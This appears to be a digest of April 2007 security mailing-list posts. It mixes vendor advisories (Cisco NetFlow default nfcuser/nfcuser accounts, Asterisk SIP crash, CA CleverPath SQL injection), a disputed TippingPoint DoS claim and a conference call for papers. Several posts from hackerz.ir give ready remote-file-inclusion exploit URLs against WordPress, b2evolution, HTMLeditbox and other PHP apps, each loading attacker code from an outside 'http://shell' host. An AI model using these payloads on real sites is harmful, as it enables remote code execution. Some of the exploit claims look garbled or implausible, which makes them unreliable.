Cisco Security Advisory: Default Passwords in NetFlow Collection Engine
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Default Passwords in NetFlow Collection Engine Advisory ID: cisco-sa-20070425-nfc http://www.cisco.com/warp/public/707/cisco-sa-20070425-nfc.shtml Revision 1.0 For Public Release 2007 April 25 1600 UTC (GMT) - - Summary === Versions of Cisco Network Services (CNS) NetFlow Collection Engine (NFC) prior to 6.0 create and use default accounts with identical usernames and passwords. An attacker with knowledge of these accounts can modify the application configuration and, in certain instances, gain user access to the host operating system. The upgrade to NFC version 6.0 is not a free upgrade. This default password issue does not require a software upgrade and can be changed by a configuration command for all affected customers. The workaround detailed in this document demonstrates how to change the passwords in 5.0. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070425-nfc.shtml. Affected Products = Vulnerable Products +-- This vulnerability affects Cisco NetFlow Collection Engine running software versions prior to 6.0.0. The software version of the Cisco NetFlow Collection Engine can be determined by either logging into the web-based user interface (UI) or using the show-tech parameter of the nfcollector command from the host operating system. For customers running version 6.0 or later, the nfcollector command uses the version parameter to determine the software level. Users can determine the NFC version by using a web browser to navigate to http://nfc-hostname:8080/nfc in a web browser and selecting About in the upper left-hand corner. The browser displays the NFC version in a new window. The NFC version can be determined from the host operating system by using the show-tech parameter of the /opt/CSCOnfc/nfcollector command. On systems running NFC version 5.0.3, the output from /opt/CSCOnfc/bin/nfcollector show-tech should display a result similar to the following: $ /opt/CSCOnfc/nfcollector show-tech ** pkginfo/swlist ** Name: CSCOnfc Relocations: /opt/CSCOnfc Version : 5.0.3 Vendor: Cisco Systems, Inc Release : 2 Build Date: Wed 06 Sep 2006 11:19:59 AM EDT Install Date: Mon 12 Feb 2007 04:26:54 PM EST Build Host: nfc-hpux.cisco.com Group : Applications/Network Source RPM: CSCOnfc-5.0.3-2.src.rpm Size: 109385602License: Copyright (c) 2002-2003 by Cisco Systems, Inc. Signature : (none) URL : http://www.cisco.com Summary : Cisco NetFlow Collector Description : Cisco CNS NetFlow Collection Engine receives, filters, and aggregates NetFlow traffic data generated by Cisco routers and switches. Products Confirmed Not Vulnerable + No other Cisco products are known to be vulnerable to the issues described in this advisory. Details === Cisco CNS NetFlow Collection Engine is used to collect and monitor NetFlow accounting data for devices that support NetFlow, such as routers and switches. This data can be used to provide a network baseline, against which irregular activities like denial of service (DoS) attacks, worms, and other malicious activity can be more easily detected. NFC is installed on a supported UNIX platform. The installation creates a default web based user account, nfcuser, which is required to perform application maintenance, configuration, and troubleshooting with a password of nfcuser. In versions prior to 6.0, the Linux installer will also create a local user, also nfcuser, on the operating system with a default password also identical to the username. If the user already exists, the Linux installer will change the password to be the same as the username. This issue is documented in Cisco Bug ID CSCsh75038 Vulnerability Scoring Details + Cisco is providing scores for the vulnerabilities in this advisory based Con the ommon Vulnerability Scoring System (CVSS). Cisco will provide a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco PSIRT will set the bias in all cases to normal. Customers are encouraged to apply the bias parameter when determining the environmental impact of a particular vulnerability. CVSS is a standards based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided an FAQ to answer additional questions regarding CVSS at http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html . Cisco has also provided a CVSS calculator to help compute the environmental impact for individual
MyNewsGroups RFI in include.php
Author: Carlos Sánchez,[EMAIL PROTECTED] BY : www.hackerz.ir users, ali saeid exploit : include.php?myng_root=http://shell
HTMLeditbox 2.2 RFI
+++ name version :HTMLeditbox 2.2 vendor: http://www.labs4.com by : www.hackerz.ir userz,s3rv3r_hack3r,saeid_only_linux,dNetGuru bug : _editor.php @include($settings[app_dir].'/inc/config.php'); exploit : http://victim/_editor.php?settings[app_dir]=http://shell ++
blogsystem 1.4 local remote = -rfi lfi -xss
demo: blog23.com by : hackerz.ir userz ! ADMIN/index.php include($category./.$folder._.$page..php); ADMIN/index.php include($category./.$action..php); ADMIN/login.php include($lngTexts); ADMIN/login.php include($lngConfig); BO/index.phpinclude($category./.$folder._.$page..php); BO/index.phpinclude($category./.$action..php); BO/login.phpinclude($lngTexts); BO/login.phpinclude($lngConfig); for example remote : ++ login to your user after that u can user exploit ADMIN/index.php include($category./.$folder._.$page..php); + local file include remote file include in admin panel BO/login.phpinclude($lngTexts); BO/login.phpinclude($lngConfig);
WordPress v2.1.3 remote file include~
by : www.hackeraz.ir userz , saeid... #WordPress 2.1.3 Remote File Inclusion # Affected Software .: WordPress 2.1.3# Download..: http://wordpress-deutschland.org # Risk ..: high # Date .: 25/4/2007 # Found by ..: s433d_only_linux # Contact ...: [EMAIL PROTECTED] # Web .: Www.hackerz.ir # special thanx ... Ali Jasbi my beste friend# Affected File: # wordpress/wp-settings.php# wordpress/wp-includes/template-loader.php# wordpress/wp-includes/theme.php# Exploit: wordpress/wp-settings.php?require_once=shell? wordpress/wp-includes/template-loader.php?include=shell? wordpress/wp-includes/theme.php?require_once=shell? ##
Re: 3Com's TippingPoint Denial of Service
TippingPoint is committed to assuring the security of our customers, and we take all reports of potential security issues against our products very seriously. Even though this report seems less than credible, we would encourgage the author of this advisory to contact us directly and provide us with additional details and sources to allow us to investigate this claim. All though there seems to be limited to no information available on how this apparent Denial of Service would be carried out, we've put our resources towards attempting to reproduce the issue, and all versions of our TOS have performed as expected with no DoS emerging. Again, if the poster of this advisory has additional information available that would allow us to successfully reproduce these claims, we would appreciate if it was submitted to us for investigation. Submissions can be made to [EMAIL PROTECTED] or on the web at www.3com.com/security. Kind Regards, TippingPoint Security Response Team [EMAIL PROTECTED] 04/24/2007 02:24 PM To bugtraq@securityfocus.com cc Subject 3Com's TippingPoint Denial of Service Vulnerability: Denial of Service Affected Product:3Com's TippingPoint IPS Affected Versions: All Author: Corroded_Lunchmeats_X Issue: == TippingPoint IPS is prone to DoS when a sequence of crafted packets are destined for port 80. Details: When quickly flooded with packets destined for port 80, and an incrementing source port this causes the software to consume a huge amount of CPU time, due to a badly written loop, causing the device to stop responding. Credits: The Kinders Kricket Krew, Aunty_Richard, The dinosaurs who died in the explosion. Disclaimer: === This document and all the information it contains are provided as is, for educational purposes only, without warranty of any kind, whether express or implied. The authors reserve the right not to be responsible for the topicality, correctness, completeness or quality of the information provided in this document. Liability claims regarding damage caused by the use of any information provided, including any kind of information which is incomplete or incorrect, will therefore be rejected. --- South Africas premier free email service - www.webmail.co.za -- For super low premiums, click here http://www.webmail.co.za/dd.pwm
ASA-2007-011: Multiple problems in SIP channel parser handling response codes
Asterisk Project Security Advisory - ASA-2007-011 ++ | Product | Asterisk | |+---| | Summary | Multiple problems in SIP channel parser handling | || response codes| |+---| | Nature of Advisory | Denial of Service | |+---| | Susceptibility | Remote Unauthenticated Sessions | |+---| | Severity | Critical | |+---| | Exploits Known | No| |+---| |Reported On | March 20, 2007| |+---| |Reported By | Mantis user ID 'qwerty1979' | |+---| | Posted On | April 24, 2007| |+---| | Last Updated On | April 24, 2007| |+---| | Advisory Contact | [EMAIL PROTECTED] | ++ ++ | Description | Multiple problems have been identified in the Asterisk | | | SIP channel driver (chan_sip) when handling response | | | packets from other SIP endpoints.| | | | | | If the response packets did not contain a valid response | | | code in the first line of the UDP packet, the Asterisk | | | SIP channel driver would fail to parse the packet| | | properly and would cause the Asterisk process to die | | | with a segmentation fault. This results in all active| | | calls and other sessions being lost. | | | | | | More details about these issues can be found at | | | http://bugs.digium.com/view.php?id=9313. | ++ ++ | Resolution | All users are urged to upgrade to the appropriate version | || of their Asterisk product listed in the 'Corrected In'| || section below.| ++ ++ | Affected Versions| || | Product | Release | | | | Series| | |---+-+--| | Asterisk Open Source|1.0.x| has not been evaluated as| | | | this release series is no| | | | longer maintained| |---+-+--| | Asterisk Open Source|1.2.x| all releases prior to 1.2.18 | |---+-+--| | Asterisk Open Source|1.4.x| all releases prior to 1.4.3 | |---+-+--| | Asterisk Business Edition |A.x.x| all releases | |---+-+--| | Asterisk Business Edition |B.x.x| all releases prior to and| | | | including B.1.3.2|
CFP: 3rd European Conference on Computer Network Defense (EC2ND)
Thanks in advance for sharing this CFP with any interested individual or mailing list. 3rd European Conference on Computer Network Defense (EC2ND) 4-5 October 2007, FORTH-ICS, Heraklion, Crete, Greece http://2007.ec2nd.org/ Call for Papers The 3rd European Conference on Computer Network Defense will take place in October 2007 at the Foundation for Research and Technology Hellas, in Crete, Greece. The theme of the conference is the protection of computer networks. The conference will draw participants from academia and industry in Europe and beyond to discuss hot topics in applied network and systems security. EC2ND invites submissions presenting novel ideas at an early stage with the intention to act as a discussion forum and feedback channel for promising, innovative security research. While our goal is to solicit ideas that are not completely worked out, and might have challenging and interesting open questions, we expect submissions to be supported by some evidence of feasibility or preliminary quantitative results. Topics include but are not limited to: * Intrusion Detection * Denial-of-Service * Privacy Protection * Security Policy * Peer-to-Peer and Grid Security * Network Monitoring * Web Security * Vulnerability Management and Tracking * Network Forensics * Wireless and Mobile Security * Cryptography * Network Discovery and Mapping * Incident Response and Management * Malicious Software * Web Services Security * Legal and Ethical Issues Submitting a Paper You are hereby invited to submit papers up to 6-8 single-spaced pages long. We particularly encourage position papers on preliminary work that shows promise, rather than mature and well-polished papers studying well-known ideas. Surprising results and thought-provoking ideas will be strongly favored. All submissions will be reviewed by the Program Committee. Accepted papers will be published in the electronic proceedings of the conference. Some papers may have to go through a shepherding process in collaboration with one of the PC members. Important Dates * Submissions due: June 24, 2007 * Notification: July 24, 2007 * Final version due: August 10, 2007 Organizers General chair: Vasilios A. Siris (FORTH) and Panos Trimintzios (ENISA) PC co-chairs: Sotiris Ioanidis and Kostas Anagnostakis Local Arrangements Chair: Vasilios A. Siris Local Arrangements Committee: Yiannis Askoksylakis and Anna Doxastaki Program Committee Herbert Bos, Vrije Universiteit Amsterdam, The Netherlands Eric Cronin, University of Pennsylvania, USA George Danezis, KU Leuven, Belgium Austin Donnelly, Microsoft Research, UK Stefanos Gritzalis, University of the Aegean, Greece Mehis Hakkaja, ENISA, EU Bjorn Knutsson, KTH, Sweden Christopher Kruegel, TU Wien, Austria Tieyan Li, Institute for Infocomm Research, Singapore Javier Lopez, Universidad de Malaga, Spain Ulrike Meyer, Nokia Siemens Networks GmbH Co., Germany Stefan Miltchev, Microsoft, USA Philippe Owezarski, LAAS-CNRS, France Michalis Polychronakis, University of Crete and FORTH-ICS, Greece George C. Polyzos, AUEB/MMlab, Greece Carlos Ribeiro, Universidade Tecnica de Lisboa, Portugal Pierangela Samarati, Universita di Milano, Italy Diomidis Spinellis, Athens University of Economics and Business, Greece Theodore Tryfonas, University of Glamorgan, UK Sven Ubik, CESNET, Czech Republic Stefano Zanero, Politecnico di Milano, Italy Steering Committee Panagiotis Trimintzios, ENISA Evangelos Markatos, FORTH-ICS, Greece Andrew Blyth, University of Glamorgan, UK -- Cordiali saluti, Stefano Zanero Politecnico di Milano - Dip. Elettronica e Informazione Via Ponzio, 34/5 I-20133 Milano - ITALY Tel.+39 02 2399-4010 Fax.+39 02 2399-3411 E-mail: [EMAIL PROTECTED] Web:www.elet.polimi.it/upload/zanero
HYIP Manager Pro Script Remote file Include
vendor : www.goldcoders.com BY : www.hackerz.ir userz,ali filez inc/libs/Smarty.class.php inc/libs/Smarty_Compiler.class.php inc/libs/core/core.display_debug_console.php inc/libs/core/core.load_plugins.php inc/libs/core/core.load_resource_plugin.php inc/libs/core/core.process_cached_inserts.php inc/libs/core/core.process_compiled_include.php inc/libs/core/core.read_cache_file.php + u can find more then this one exploit : http://victim/inc/libs/Smarty_Compiler.class.php?plugin_file=http://shell/?
VirtuaNews.Pro.v1.0.3.Retail.+All.Plugins Remote file Include
VirtuaNews.Pro.v1.0.3.Retail.+All.Plugins Remote file Include DownloasScript: http://www.virtuanews.co.uk ### Affected Software .: VirtuaNews.Pro.v1.0.3.Retail.+All.Plugins Download..: http://www.virtuanews.co.uk Risk ..: high Date .: 25/4/2007 Found by ..: s433d_only_linux Contact ...: s433d_only_linux (at) yahoo (dot) de [email concealed] Web .: Www.hackerz.ir special thanx ... Ali Jasbi my beste friend # Affected File: upload/admin.php include($admindirectory./.$key..php); upload/admin.php include($admindirectory./.$val..php); # Explit: http://seit.com/upload/admin.php?include=shell?
Security Advisory: CA CleverPath SQL Injection
Background == The CA Clever Path Portal is a customizable portal for aggregation and integration of data and applications. It is integrated into multiple CA products including various Unicenter components. The CA CleverPath utilizes a back end Database for storing data and allows usage of either built in or external Database. Scope = After identifying in CleverPath an irregular behavior when modifying query parameters in the search mechanism, Hacktics has conducted a research of identifying an SQL Injection vulnerability in the implementation of the search query construction. The Finding === By modifying certain parameters in the execute search URL, it was possible to cause the application to send to the database queries that are different than those originally intended by the search engine, and as a result retrieving the entire database contents according to the application user permissions scheme in the database. Note: Due to the diversity of possible Database implementations for CleverPath, the actual level of possible exploitation may vary between different systems. Exploit Details === Due to the complexity of the required syntax, the identified SQL injection does not allow for trivial exploitation such as UNION SELECT. However, data can be still retrieved using Binary Search techniques. For detailed technical description and exploit please visit http://www.hacktics.com/AdvCleverPathApr07.html Affected Systems Multiple CA products and 3rd party products utilizing the CleverPath Portal. Solution CA Has been notified of this vulnerability on Januarty 18th, and is releasing a patch together with the publication of the vulnerability. --- Irene Abezgauz Senior Consultant Account Manager Hacktics Ltd. Mobile: +972-54-6545405 Web: http://www.hacktics.com/
Remote File Inclusion
# b2evolution Remote File Inclusion# Affected Software .: b2evolution # Download..: http://b2evolution.net/# Risk ..: high # Date .: 25/4/2007 # Found by ..: s433d_only_linux # Contact ...: [EMAIL PROTECTED] # Web .: Www.hackerz.ir # special thanx ... Ali Jasbi my beste friend# Affected File: b2evolution\blogs/a_noskin.php require $inc_path.'_blog_main.inc.php'; b2evolution\blogs/a_stub.phprequire $inc_path.'_blog_main.inc.php'; b2evolution\blogs/admin.php require_once $inc_path.'_main.inc.php'; b2evolution\blogs/admin.php require $view_path.'errors/_access_denied.inc.php'; b2evolution\blogs/admin.php require_once $inc_path.'_async.inc.php'; b2evolution\blogs/admin.php require $control_path.$ctrl_mappings[$ctrl]; b2evolution\blogs/contact.php require_once $inc_path.'_main.inc.php'; b2evolution\blogs/contact.php require $skins_path.'_msgform.php'; b2evolution\blogs/default.php require_once $inc_path.'_main.inc.php'; b2evolution\blogs/index.php require_once $inc_path.'_main.inc.php'; b2evolution\blogs/index.php require $inc_path.'_blog_main.inc.php'; b2evolution\blogs/multiblogs.phprequire_once $inc_path.'_blog_main.inc.php'; b2evolution\blogs/multiblogs.phprequire $skins_path.'_bloglist.php'; b2evolution\blogs/multiblogs.phprequire $skins_path.'_feedback.php'; ## b2evolution\blogs/a_noskin.php?require=shell? b2evolution\blogs/a_stub.php?_blog_main.inc.php=shell? b2evolution\blogs/admin.php?inc_path= b2evolution\blogs/admin.php?errors/_access_denied.inc.php=shell? b2evolution\blogs/admin.php?inc_path=shell
:doruk100net RFI
++ name version :doruk100net vendor: Doruk100.net download : http://rapidshare.de/files/31874580/doruk100net.rar.html by : www.hackerz.ir userz,s3rv3r_hack3r,saeid_only_linux,farzad exploit: http://victim/info.php?file=http://shell ++
